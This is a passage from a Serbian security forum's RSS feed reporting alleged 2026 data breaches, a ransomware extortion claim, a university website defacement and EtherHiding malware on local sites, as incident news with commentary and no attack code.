<a  class="vmiddle inline-block" href="attachment.php?aid=7751" target="_blank">mk.png</a> <span class="smalltext float_right">Size: <span class="inline-block vmiddle">223.91 KB</span>&nbsp;&nbsp;Downloads: <span class="inline-block vmiddle">147</span></span>
</div>
<!-- end: postbit_attachments_attachment -->]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Navodno kompromitovan portal za "studente i stipendije" - procureli podaci studenata]]></title>
			<link>https://bezbedanbalkan.net/thread-2705.html</link>
			<pubDate>Wed, 26 Aug 2026 14:24:40 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://bezbedanbalkan.net/member.php?action=profile&uid=40">milos_rs</a>]]></dc:creator>
			<guid isPermaLink="false">https://bezbedanbalkan.net/thread-2705.html</guid>
			<description><![CDATA["Albanian Electronic Army" je navodno kompromitovala baze podataka sa portala za "studente i stipendije", pretpostavljam Ministarstva Prosvete<br />
<br />
<!-- start: postbit_attachments_attachment -->
<div style="padding:4px 0px;"><span class="inline-block vmiddle"><!-- start: attachment_icon -->
<img src="https://bezbedanbalkan.net/images/attachtypes/image.png" title="PNG Image" alt=".png" />
<!-- end: attachment_icon --></span>
<a  class="vmiddle inline-block" href="attachment.php?aid=7738" target="_blank">pros3.png</a> <span class="smalltext float_right">Size: <span class="inline-block vmiddle">104.72 KB</span>&nbsp;&nbsp;Downloads: <span class="inline-block vmiddle">361</span></span>
</div>
<!-- end: postbit_attachments_attachment --><br />
<br />
Akteri su opisali vektor napda koji im je omogućio pristup podacima koji je prilično sramotan za one koji su kreirali i štite ovaj portal.<br />
<br />
Među podacima su nekakve prijave, studentski podaci i popunjena dokumentacija.<br />
<br />
Šema navodnih studentskih podataka je :<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>ksg_id,brojDokumenta,ime,prezime,ime_roditelja,prezime_roditelja,jmbg,jmbg_roditelja,email,telefon,username,ip_address,broj_racuna,broj_kartice,broj_lk,broj_lk_roditelja,ulica,broj,mesto_prebivalista,opstina_prebivalista,postanski_broj,opstina_lk,skolska_godina,godina_prvog_upisa,ustanova,smer,godina_razred,vrsta_studija,osetljiva_grupa,status,tip_korisnika</code></div></div><br />
Deluje mi slično kao podaci koji se nalaze na portalu za prijavljivanje na studentske i učeničke kredite i stipendije koji je već ranije imao ranjivosti: <a href="https://bezbedanbalkan.net/thread-1897.html" target="_blank" rel="noopener" class="mycode_url">kreditistipendije.prosveta.gov.rs - enumeracija ličnih podataka putem IDOR ranjivosti</a>]]></description>
			<content:encoded><![CDATA["Albanian Electronic Army" je navodno kompromitovala baze podataka sa portala za "studente i stipendije", pretpostavljam Ministarstva Prosvete<br />
<br />
<!-- start: postbit_attachments_attachment -->
<div style="padding:4px 0px;"><span class="inline-block vmiddle"><!-- start: attachment_icon -->
<img src="https://bezbedanbalkan.net/images/attachtypes/image.png" title="PNG Image" alt=".png" />
<!-- end: attachment_icon --></span>
<a  class="vmiddle inline-block" href="attachment.php?aid=7738" target="_blank">pros3.png</a> <span class="smalltext float_right">Size: <span class="inline-block vmiddle">104.72 KB</span>&nbsp;&nbsp;Downloads: <span class="inline-block vmiddle">361</span></span>
</div>
<!-- end: postbit_attachments_attachment --><br />
<br />
Akteri su opisali vektor napda koji im je omogućio pristup podacima koji je prilično sramotan za one koji su kreirali i štite ovaj portal.<br />
<br />
Među podacima su nekakve prijave, studentski podaci i popunjena dokumentacija.<br />
<br />
Šema navodnih studentskih podataka je :<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>ksg_id,brojDokumenta,ime,prezime,ime_roditelja,prezime_roditelja,jmbg,jmbg_roditelja,email,telefon,username,ip_address,broj_racuna,broj_kartice,broj_lk,broj_lk_roditelja,ulica,broj,mesto_prebivalista,opstina_prebivalista,postanski_broj,opstina_lk,skolska_godina,godina_prvog_upisa,ustanova,smer,godina_razred,vrsta_studija,osetljiva_grupa,status,tip_korisnika</code></div></div><br />
Deluje mi slično kao podaci koji se nalaze na portalu za prijavljivanje na studentske i učeničke kredite i stipendije koji je već ranije imao ranjivosti: <a href="https://bezbedanbalkan.net/thread-1897.html" target="_blank" rel="noopener" class="mycode_url">kreditistipendije.prosveta.gov.rs - enumeracija ličnih podataka putem IDOR ranjivosti</a>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Oglašena prodaja navodne baze ličnih i medicinskih podataka 4.3M građana Srbije]]></title>
			<link>https://bezbedanbalkan.net/thread-2703.html</link>
			<pubDate>Mon, 24 Aug 2026 21:40:06 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://bezbedanbalkan.net/member.php?action=profile&uid=40">milos_rs</a>]]></dc:creator>
			<guid isPermaLink="false">https://bezbedanbalkan.net/thread-2703.html</guid>
			<description><![CDATA["INF Grupa" je pre neki dan objavila <a href="https://bezbedanbalkan.net/thread-2696.html" target="_blank" rel="noopener" class="mycode_url">Na jednom forumu objavljena prodaja navodne baze podataka 1M građana Srbije</a><br />
<br />
Sada je ta objava obrisana i pojavila se nova sa daleko više podataka i uz uzorak i više detalja. Očigledno se radi o istoj skupini podataka, sada proširenoj...<br />
<br />
<!-- start: postbit_attachments_attachment -->
<div style="padding:4px 0px;"><span class="inline-block vmiddle"><!-- start: attachment_icon -->
<img src="https://bezbedanbalkan.net/images/attachtypes/image.png" title="PNG Image" alt=".png" />
<!-- end: attachment_icon --></span>
<a  class="vmiddle inline-block" href="attachment.php?aid=7729" target="_blank">infmed3.png</a> <span class="smalltext float_right">Size: <span class="inline-block vmiddle">194.84 KB</span>&nbsp;&nbsp;Downloads: <span class="inline-block vmiddle">1904</span></span>
</div>
<!-- end: postbit_attachments_attachment --><br />
<br />
Navodni podaci sadrže ime prezime, JMBG, broj pasoša, broj lične karte, datum rođenja, adresu, broj telefona, email kao i dva nepoznata medicinska podatka.<br />
<br />
U objavi se takođe žale da im je ugašena prethodna protonmail mejl adresa. Tu mejl adresu su koristili baš dugo čudo je da je opstala do sada.<br />
<br />
Postavili su jedan zapis kao uzorak :<br />
<br />
<!-- start: postbit_attachments_attachment -->
<div style="padding:4px 0px;"><span class="inline-block vmiddle"><!-- start: attachment_icon -->
<img src="https://bezbedanbalkan.net/images/attachtypes/image.png" title="PNG Image" alt=".png" />
<!-- end: attachment_icon --></span>
<a  class="vmiddle inline-block" href="attachment.php?aid=7727" target="_blank">infmed4.png</a> <span class="smalltext float_right">Size: <span class="inline-block vmiddle">47.33 KB</span>&nbsp;&nbsp;Downloads: <span class="inline-block vmiddle">1917</span></span>
</div>
<!-- end: postbit_attachments_attachment --><br />
<br />
Smatram da ovolika količina podaka i to medicinskih može samo doći od neke državne institucije, obzirom na uključene medicinske podatke to je moguće RFZO koji je skoro pretrpeo ozbiljnu kompromitaciju: <a href="https://bezbedanbalkan.net/thread-2684.html" target="_blank" rel="noopener" class="mycode_url">Kompromitovan RFZO - akter nudi sve baze podataka osiguranika na prodaju </a><br />
<br />
Akteri tvrde da ponuđena baza sadrži 4.3 miliona zapisa, RFZO osigurava oko 4.8 miliona lica (penzioneri su osigurani preko PIO fonda te nisu u RFZO). Ne podudara se baš brojka ali jeste dosta blizu, možda ova baza ne sadrži neku kategoriju osiguranika.<br />
<br />
Čudno mi je da podaci sadrže broj telefona i e-mail adresu, ovo nisu podaci koji se uobičajeno daju RFZO ili medicinskim ustanovama, naročito e-mail adresa. Broj pasoša takođe nije baš uobičajen za medicinske usluge, ako su ovo RFZO podaci onda su pothranjeni nekim drugim izvorima podataka. Pada mi na pamet eUprava koja sadrži sve ove lične podatke ali samo 2.9 miliona građana ima nalog tamo te se ne uklapa. Sada već previše špekulišem zaista ne znam koja baza bi imala 4.3 miliona e-mail adresa građana, moramo pretpostaviti da nisu svih 4.3 miliona zapisa sa e-mail adresama kao što vidimo i u uzorku da zapis nema broj pasoša.]]></description>
			<content:encoded><![CDATA["INF Grupa" je pre neki dan objavila <a href="https://bezbedanbalkan.net/thread-2696.html" target="_blank" rel="noopener" class="mycode_url">Na jednom forumu objavljena prodaja navodne baze podataka 1M građana Srbije</a><br />
<br />
Sada je ta objava obrisana i pojavila se nova sa daleko više podataka i uz uzorak i više detalja. Očigledno se radi o istoj skupini podataka, sada proširenoj...<br />
<br />
<!-- start: postbit_attachments_attachment -->
<div style="padding:4px 0px;"><span class="inline-block vmiddle"><!-- start: attachment_icon -->
<img src="https://bezbedanbalkan.net/images/attachtypes/image.png" title="PNG Image" alt=".png" />
<!-- end: attachment_icon --></span>
<a  class="vmiddle inline-block" href="attachment.php?aid=7729" target="_blank">infmed3.png</a> <span class="smalltext float_right">Size: <span class="inline-block vmiddle">194.84 KB</span>&nbsp;&nbsp;Downloads: <span class="inline-block vmiddle">1904</span></span>
</div>
<!-- end: postbit_attachments_attachment --><br />
<br />
Navodni podaci sadrže ime prezime, JMBG, broj pasoša, broj lične karte, datum rođenja, adresu, broj telefona, email kao i dva nepoznata medicinska podatka.<br />
<br />
U objavi se takođe žale da im je ugašena prethodna protonmail mejl adresa. Tu mejl adresu su koristili baš dugo čudo je da je opstala do sada.<br />
<br />
Postavili su jedan zapis kao uzorak :<br />
<br />
<!-- start: postbit_attachments_attachment -->
<div style="padding:4px 0px;"><span class="inline-block vmiddle"><!-- start: attachment_icon -->
<img src="https://bezbedanbalkan.net/images/attachtypes/image.png" title="PNG Image" alt=".png" />
<!-- end: attachment_icon --></span>
<a  class="vmiddle inline-block" href="attachment.php?aid=7727" target="_blank">infmed4.png</a> <span class="smalltext float_right">Size: <span class="inline-block vmiddle">47.33 KB</span>&nbsp;&nbsp;Downloads: <span class="inline-block vmiddle">1917</span></span>
</div>
<!-- end: postbit_attachments_attachment --><br />
<br />
Smatram da ovolika količina podaka i to medicinskih može samo doći od neke državne institucije, obzirom na uključene medicinske podatke to je moguće RFZO koji je skoro pretrpeo ozbiljnu kompromitaciju: <a href="https://bezbedanbalkan.net/thread-2684.html" target="_blank" rel="noopener" class="mycode_url">Kompromitovan RFZO - akter nudi sve baze podataka osiguranika na prodaju </a><br />
<br />
Akteri tvrde da ponuđena baza sadrži 4.3 miliona zapisa, RFZO osigurava oko 4.8 miliona lica (penzioneri su osigurani preko PIO fonda te nisu u RFZO). Ne podudara se baš brojka ali jeste dosta blizu, možda ova baza ne sadrži neku kategoriju osiguranika.<br />
<br />
Čudno mi je da podaci sadrže broj telefona i e-mail adresu, ovo nisu podaci koji se uobičajeno daju RFZO ili medicinskim ustanovama, naročito e-mail adresa. Broj pasoša takođe nije baš uobičajen za medicinske usluge, ako su ovo RFZO podaci onda su pothranjeni nekim drugim izvorima podataka. Pada mi na pamet eUprava koja sadrži sve ove lične podatke ali samo 2.9 miliona građana ima nalog tamo te se ne uklapa. Sada već previše špekulišem zaista ne znam koja baza bi imala 4.3 miliona e-mail adresa građana, moramo pretpostaviti da nisu svih 4.3 miliona zapisa sa e-mail adresama kao što vidimo i u uzorku da zapis nema broj pasoša.]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Ransomware ekipa tvrdi da poseduje podatke SENVIBE projekta]]></title>
			<link>https://bezbedanbalkan.net/thread-2702.html</link>
			<pubDate>Mon, 24 Aug 2026 20:28:13 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://bezbedanbalkan.net/member.php?action=profile&uid=40">milos_rs</a>]]></dc:creator>
			<guid isPermaLink="false">https://bezbedanbalkan.net/thread-2702.html</guid>
			<description><![CDATA[Grupa Panzer je novija grupa u ransomware svetu, počela je da operiše početkom avgusta i očigledno nemaju baš iskustvo jer nisu znali da napišu čije su podatke navodno uzeli...<br />
<br />
Prvo su napisali Univerzitet u Kragujevcu :<br />
<br />
<!-- start: postbit_attachments_attachment -->
<div style="padding:4px 0px;"><span class="inline-block vmiddle"><!-- start: attachment_icon -->
<img src="https://bezbedanbalkan.net/images/attachtypes/image.png" title="PNG Image" alt=".png" />
<!-- end: attachment_icon --></span>
<a  class="vmiddle inline-block" href="attachment.php?aid=7723" target="_blank">senvibe1.png</a> <span class="smalltext float_right">Size: <span class="inline-block vmiddle">124.6 KB</span>&nbsp;&nbsp;Downloads: <span class="inline-block vmiddle">323</span></span>
</div>
<!-- end: postbit_attachments_attachment --><br />
<br />
Pa su napisali Senvibe :<br />
<br />
<!-- start: postbit_attachments_attachment -->
<div style="padding:4px 0px;"><span class="inline-block vmiddle"><!-- start: attachment_icon -->
<img src="https://bezbedanbalkan.net/images/attachtypes/image.png" title="PNG Image" alt=".png" />
<!-- end: attachment_icon --></span>
<a  class="vmiddle inline-block" href="attachment.php?aid=7724" target="_blank">senvibe2.png</a> <span class="smalltext float_right">Size: <span class="inline-block vmiddle">173.67 KB</span>&nbsp;&nbsp;Downloads: <span class="inline-block vmiddle">324</span></span>
</div>
<!-- end: postbit_attachments_attachment --><br />
<br />
Pa su napisali i trenutno stoji Pokrajinska vlada Vojvodine :<br />
<br />
<!-- start: postbit_attachments_attachment -->
<div style="padding:4px 0px;"><span class="inline-block vmiddle"><!-- start: attachment_icon -->
<img src="https://bezbedanbalkan.net/images/attachtypes/image.png" title="PNG Image" alt=".png" />
<!-- end: attachment_icon --></span>
<a  class="vmiddle inline-block" href="attachment.php?aid=7725" target="_blank">senvibe3.png</a> <span class="smalltext float_right">Size: <span class="inline-block vmiddle">56.12 KB</span>&nbsp;&nbsp;Downloads: <span class="inline-block vmiddle">326</span></span>
</div>
<!-- end: postbit_attachments_attachment --><br />
<br />
Pošto su okačili stablo direktorijuma podataka koje navodno poseduju jasno je da su podaci od SENVIBE projekta ali odakle su konkretno preuzeti nije poznato, moguće sa nekog univerziteta koji učestvuje u projektu. <br />
<br />
Izgleda da je sva dokumentacija SENVIBE projekta u pitanju. Tvrde d poseduju 29GB podataka, stablo direktorijuma sadrži "690 directories, 6325 files"<br />
<br />
Šta je SENVIBE?<br />
<br />
<blockquote class="mycode_quote"><cite>Quote:</cite>SENVIBE - Strengthening Educational Capacities by Building Competences and Cooperation in the Field of Noise and Vibration Engineering<br />
<br />
SENVIBE projekat je osnovan uz pomoć Evropske komisije i bavi se jačanjem obrazovnih kapaciteta izgradnjom kompetencija i saradnje u oblasti inženjerstva buke i vibracija. <br />
U osnovi SENVIBE projekta jeste strateško unapređenje obrazovnih kapaciteta i saradnje u oblasti buke i vibracija. Projekat traje tri godine, a podizanje kapaciteta i kompetencija u ovoj oblasti očekuje se kroz:<br />
- modernizaciju i uvođenje novih modula i predmeta na studijama mašinstva, građevinarstva, saobraćajnog inženjerstva, elektrotehnike, zaštite životne sredine i zaštite na radu;<br />
- uvođenje prvog master programa iz vibro-akustike u Republici Srbiji;<br />
- kreiranje kurseva za celoživotno učenje iz oblasti buke i vibracija koje će se sprovoditi u celoj zemlji za zainteresovane subjekte;<br />
- uspostavljanje jedinstvenog centra (No&amp;Vib Hub) za saradnju između akademskih i neakademskih institucija u ovoj oblasti. No&amp;Vib Hub ima za cilj da se, pored unapređenja i razmene stručnog znanja i iskustava, unapredi rad i povezivanje organa uprave, privrede i visokog obrazovanja u ovoj oblasti i zajednički utiče na podizanje svesti šire zajednice po pitanju buke i vibracija u životnoj i radnoj sredini. <br />
<br />
Projektni partneri:<br />
<br />
Univerziteti iz R.Srbije: Univerzitet u Novom Sadu(koordinator), Univerzitet u Nišu, Univerzitet u Kragujevcu, Univerzitet Educons<br />
Univerziteti iz inostranstva:<br />
Univerzitet u Sautemptonu(Velika Britanija),KTH iz Stokholma (Švedska)<br />
Neakademski partneri:<br />
Pokrajinski sekreterijat za urbanizam i zaštitu životne sredine, AP Vojvodine, Zavod za zdravstvenu zaštituradnika Novi Sad, Unija poslodavaca Vojvodine.<br />
Pridruženi partneri: Privredna komora Srbije, Evropsko udruženje mladih akustičara. </blockquote>
<br />
Ransomware ekipa daje 22 dana i verovatno traži nekakav otkup da ne bi objavili podatke. Ekipa je nova pa nije baš poznato kako funkcioniše, do sada nisu objavili podatke ni jedne navodne žrtve.]]></description>
			<content:encoded><![CDATA[Grupa Panzer je novija grupa u ransomware svetu, počela je da operiše početkom avgusta i očigledno nemaju baš iskustvo jer nisu znali da napišu čije su podatke navodno uzeli...<br />
<br />
Prvo su napisali Univerzitet u Kragujevcu :<br />
<br />
<!-- start: postbit_attachments_attachment -->
<div style="padding:4px 0px;"><span class="inline-block vmiddle"><!-- start: attachment_icon -->
<img src="https://bezbedanbalkan.net/images/attachtypes/image.png" title="PNG Image" alt=".png" />
<!-- end: attachment_icon --></span>
<a  class="vmiddle inline-block" href="attachment.php?aid=7723" target="_blank">senvibe1.png</a> <span class="smalltext float_right">Size: <span class="inline-block vmiddle">124.6 KB</span>&nbsp;&nbsp;Downloads: <span class="inline-block vmiddle">323</span></span>
</div>
<!-- end: postbit_attachments_attachment --><br />
<br />
Pa su napisali Senvibe :<br />
<br />
<!-- start: postbit_attachments_attachment -->
<div style="padding:4px 0px;"><span class="inline-block vmiddle"><!-- start: attachment_icon -->
<img src="https://bezbedanbalkan.net/images/attachtypes/image.png" title="PNG Image" alt=".png" />
<!-- end: attachment_icon --></span>
<a  class="vmiddle inline-block" href="attachment.php?aid=7724" target="_blank">senvibe2.png</a> <span class="smalltext float_right">Size: <span class="inline-block vmiddle">173.67 KB</span>&nbsp;&nbsp;Downloads: <span class="inline-block vmiddle">324</span></span>
</div>
<!-- end: postbit_attachments_attachment --><br />
<br />
Pa su napisali i trenutno stoji Pokrajinska vlada Vojvodine :<br />
<br />
<!-- start: postbit_attachments_attachment -->
<div style="padding:4px 0px;"><span class="inline-block vmiddle"><!-- start: attachment_icon -->
<img src="https://bezbedanbalkan.net/images/attachtypes/image.png" title="PNG Image" alt=".png" />
<!-- end: attachment_icon --></span>
<a  class="vmiddle inline-block" href="attachment.php?aid=7725" target="_blank">senvibe3.png</a> <span class="smalltext float_right">Size: <span class="inline-block vmiddle">56.12 KB</span>&nbsp;&nbsp;Downloads: <span class="inline-block vmiddle">326</span></span>
</div>
<!-- end: postbit_attachments_attachment --><br />
<br />
Pošto su okačili stablo direktorijuma podataka koje navodno poseduju jasno je da su podaci od SENVIBE projekta ali odakle su konkretno preuzeti nije poznato, moguće sa nekog univerziteta koji učestvuje u projektu. <br />
<br />
Izgleda da je sva dokumentacija SENVIBE projekta u pitanju. Tvrde d poseduju 29GB podataka, stablo direktorijuma sadrži "690 directories, 6325 files"<br />
<br />
Šta je SENVIBE?<br />
<br />
<blockquote class="mycode_quote"><cite>Quote:</cite>SENVIBE - Strengthening Educational Capacities by Building Competences and Cooperation in the Field of Noise and Vibration Engineering<br />
<br />
SENVIBE projekat je osnovan uz pomoć Evropske komisije i bavi se jačanjem obrazovnih kapaciteta izgradnjom kompetencija i saradnje u oblasti inženjerstva buke i vibracija. <br />
U osnovi SENVIBE projekta jeste strateško unapređenje obrazovnih kapaciteta i saradnje u oblasti buke i vibracija. Projekat traje tri godine, a podizanje kapaciteta i kompetencija u ovoj oblasti očekuje se kroz:<br />
- modernizaciju i uvođenje novih modula i predmeta na studijama mašinstva, građevinarstva, saobraćajnog inženjerstva, elektrotehnike, zaštite životne sredine i zaštite na radu;<br />
- uvođenje prvog master programa iz vibro-akustike u Republici Srbiji;<br />
- kreiranje kurseva za celoživotno učenje iz oblasti buke i vibracija koje će se sprovoditi u celoj zemlji za zainteresovane subjekte;<br />
- uspostavljanje jedinstvenog centra (No&amp;Vib Hub) za saradnju između akademskih i neakademskih institucija u ovoj oblasti. No&amp;Vib Hub ima za cilj da se, pored unapređenja i razmene stručnog znanja i iskustava, unapredi rad i povezivanje organa uprave, privrede i visokog obrazovanja u ovoj oblasti i zajednički utiče na podizanje svesti šire zajednice po pitanju buke i vibracija u životnoj i radnoj sredini. <br />
<br />
Projektni partneri:<br />
<br />
Univerziteti iz R.Srbije: Univerzitet u Novom Sadu(koordinator), Univerzitet u Nišu, Univerzitet u Kragujevcu, Univerzitet Educons<br />
Univerziteti iz inostranstva:<br />
Univerzitet u Sautemptonu(Velika Britanija),KTH iz Stokholma (Švedska)<br />
Neakademski partneri:<br />
Pokrajinski sekreterijat za urbanizam i zaštitu životne sredine, AP Vojvodine, Zavod za zdravstvenu zaštituradnika Novi Sad, Unija poslodavaca Vojvodine.<br />
Pridruženi partneri: Privredna komora Srbije, Evropsko udruženje mladih akustičara. </blockquote>
<br />
Ransomware ekipa daje 22 dana i verovatno traži nekakav otkup da ne bi objavili podatke. Ekipa je nova pa nije baš poznato kako funkcioniše, do sada nisu objavili podatke ni jedne navodne žrtve.]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[[BA] Hakeri upali na sajt Univerziteta u Zenici, osvanule poruke o online kockanju]]></title>
			<link>https://bezbedanbalkan.net/thread-2695.html</link>
			<pubDate>Sat, 22 Aug 2026 06:05:23 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://bezbedanbalkan.net/member.php?action=profile&uid=40">milos_rs</a>]]></dc:creator>
			<guid isPermaLink="false">https://bezbedanbalkan.net/thread-2695.html</guid>
			<description><![CDATA[<a href="https://www.oslobodjenje.ba/vijesti/bih/hakeri-upali-na-stranicu-univerziteta-u-zenici-osvanule-poruke-o-online-kockanju/" target="_blank" rel="noopener" class="mycode_url">Mobilna verzija stranice potpuno je kompromitovana, sporni sadržaji završili su i u Googleovom indeksu, a Univerzitet se zasad nije oglasio</a><br />
<br />
<blockquote class="mycode_quote"><cite>Quote:</cite>Riječ je o sadržaju karakterističnom za SEO spam i takozvani gambling defacement, a većina ubačenih izraza je na indonežanskom jeziku.</blockquote>
<br />
<br />
Sajr je trenutno ugašen :<br />
<br />
<!-- start: postbit_attachments_attachment -->
<div style="padding:4px 0px;"><span class="inline-block vmiddle"><!-- start: attachment_icon -->
<img src="https://bezbedanbalkan.net/images/attachtypes/image.png" title="JPG Image" alt=".jpg" />
<!-- end: attachment_icon --></span>
<a  class="vmiddle inline-block" href="attachment.php?aid=7705" target="_blank">uz2.jpg</a> <span class="smalltext float_right">Size: <span class="inline-block vmiddle">380.52 KB</span>&nbsp;&nbsp;Downloads: <span class="inline-block vmiddle">185</span></span>
</div>
<!-- end: postbit_attachments_attachment -->]]></description>
			<content:encoded><![CDATA[<a href="https://www.oslobodjenje.ba/vijesti/bih/hakeri-upali-na-stranicu-univerziteta-u-zenici-osvanule-poruke-o-online-kockanju/" target="_blank" rel="noopener" class="mycode_url">Mobilna verzija stranice potpuno je kompromitovana, sporni sadržaji završili su i u Googleovom indeksu, a Univerzitet se zasad nije oglasio</a><br />
<br />
<blockquote class="mycode_quote"><cite>Quote:</cite>Riječ je o sadržaju karakterističnom za SEO spam i takozvani gambling defacement, a većina ubačenih izraza je na indonežanskom jeziku.</blockquote>
<br />
<br />
Sajr je trenutno ugašen :<br />
<br />
<!-- start: postbit_attachments_attachment -->
<div style="padding:4px 0px;"><span class="inline-block vmiddle"><!-- start: attachment_icon -->
<img src="https://bezbedanbalkan.net/images/attachtypes/image.png" title="JPG Image" alt=".jpg" />
<!-- end: attachment_icon --></span>
<a  class="vmiddle inline-block" href="attachment.php?aid=7705" target="_blank">uz2.jpg</a> <span class="smalltext float_right">Size: <span class="inline-block vmiddle">380.52 KB</span>&nbsp;&nbsp;Downloads: <span class="inline-block vmiddle">185</span></span>
</div>
<!-- end: postbit_attachments_attachment -->]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[EtherHiding napad na domaće sajtove]]></title>
			<link>https://bezbedanbalkan.net/thread-2690.html</link>
			<pubDate>Thu, 20 Aug 2026 14:15:45 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://bezbedanbalkan.net/member.php?action=profile&uid=110">VincaSec</a>]]></dc:creator>
			<guid isPermaLink="false">https://bezbedanbalkan.net/thread-2690.html</guid>
			<description><![CDATA[Pregledom ThreatFox baze uočio sam indikatore kompromitacije sa tagom etherhiding koji otkrivaju da je niz legitimnih srpskih sajtova poput obrazovnih i privatnih, hakovano i zloupotrebljeno od strane nepoznatog loadera malvera. Ovi kompromitovani sajtovi služe kao početna tačka za napad jer u svom kodu sadrže skrivene skripte koje posetiocima preusmeravaju ili preuzimaju maliciozni sadržaj.<br />
<br />
<!-- start: postbit_attachments_attachment -->
<div style="padding:4px 0px;"><span class="inline-block vmiddle"><!-- start: attachment_icon -->
<img src="https://bezbedanbalkan.net/images/attachtypes/image.png" title="PNG Image" alt=".png" />
<!-- end: attachment_icon --></span>
<a  class="vmiddle inline-block" href="attachment.php?aid=7693" target="_blank">eth.png</a> <span class="smalltext float_right">Size: <span class="inline-block vmiddle">86.68 KB</span>&nbsp;&nbsp;Downloads: <span class="inline-block vmiddle">269</span></span>
</div>
<!-- end: postbit_attachments_attachment --><br />
<br />
U pitanju je napredna tehnika pod nazivom EtherHiding, u kojoj napadači umesto klasičnih servera koriste javni blokčejn i pametne ugovore za skrivanje i preuzimanje malicioznih instrukcija.<br />
<br />
<a href="https://www.stormshield.com/news/cti-etherhiding-blockchain-technology/" target="_blank" rel="noopener" class="mycode_url">https://www.stormshield.com/news/cti-eth...echnology/</a>]]></description>
			<content:encoded><![CDATA[Pregledom ThreatFox baze uočio sam indikatore kompromitacije sa tagom etherhiding koji otkrivaju da je niz legitimnih srpskih sajtova poput obrazovnih i privatnih, hakovano i zloupotrebljeno od strane nepoznatog loadera malvera. Ovi kompromitovani sajtovi služe kao početna tačka za napad jer u svom kodu sadrže skrivene skripte koje posetiocima preusmeravaju ili preuzimaju maliciozni sadržaj.<br />
<br />
<!-- start: postbit_attachments_attachment -->
<div style="padding:4px 0px;"><span class="inline-block vmiddle"><!-- start: attachment_icon -->
<img src="https://bezbedanbalkan.net/images/attachtypes/image.png" title="PNG Image" alt=".png" />
<!-- end: attachment_icon --></span>
<a  class="vmiddle inline-block" href="attachment.php?aid=7693" target="_blank">eth.png</a> <span class="smalltext float_right">Size: <span class="inline-block vmiddle">86.68 KB</span>&nbsp;&nbsp;Downloads: <span class="inline-block vmiddle">269</span></span>
</div>
<!-- end: postbit_attachments_attachment --><br />
<br />
U pitanju je napredna tehnika pod nazivom EtherHiding, u kojoj napadači umesto klasičnih servera koriste javni blokčejn i pametne ugovore za skrivanje i preuzimanje malicioznih instrukcija.<br />
<br />
<a href="https://www.stormshield.com/news/cti-etherhiding-blockchain-technology/" target="_blank" rel="noopener" class="mycode_url">https://www.stormshield.com/news/cti-eth...echnology/</a>]]></content:encoded>
		</item>
	</channel>
</rss>